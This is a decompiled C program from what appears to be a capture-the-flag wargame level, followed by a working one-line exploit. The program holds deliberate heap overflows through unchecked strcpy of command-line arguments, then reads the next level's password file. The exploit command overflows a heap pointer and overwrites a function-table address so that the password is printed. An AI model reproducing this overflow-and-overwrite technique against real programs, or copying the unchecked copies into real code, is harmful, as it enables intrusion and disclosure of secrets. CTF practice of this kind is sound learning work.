char *str;

int m() // 0x080484f4
{
    return printf("%s - %d\n", &str, time(NULL));
}

int main( int argc, char *argv[] )
{
    int32_t *arr1 = malloc(8);
    arr1[0] = 1;
    arr1[1] = malloc(8);

    int32_t *arr2 = malloc(8);
    arr2[0] = 2;
    arr2[1] = malloc(8);

    strcpy(arr1[1], argv[1]);
    strcpy(arr2[1], argv[2]);

    fgets(str, 68, fopen("/home/user/level8/.pass", "r"));
    puts("~~");

    return 0;
}

./level7 $(python -c 'print "A"*20 + "\x28\x99\x04\x08"') $(python -c 'print "\xf4\x84\x04\x08"')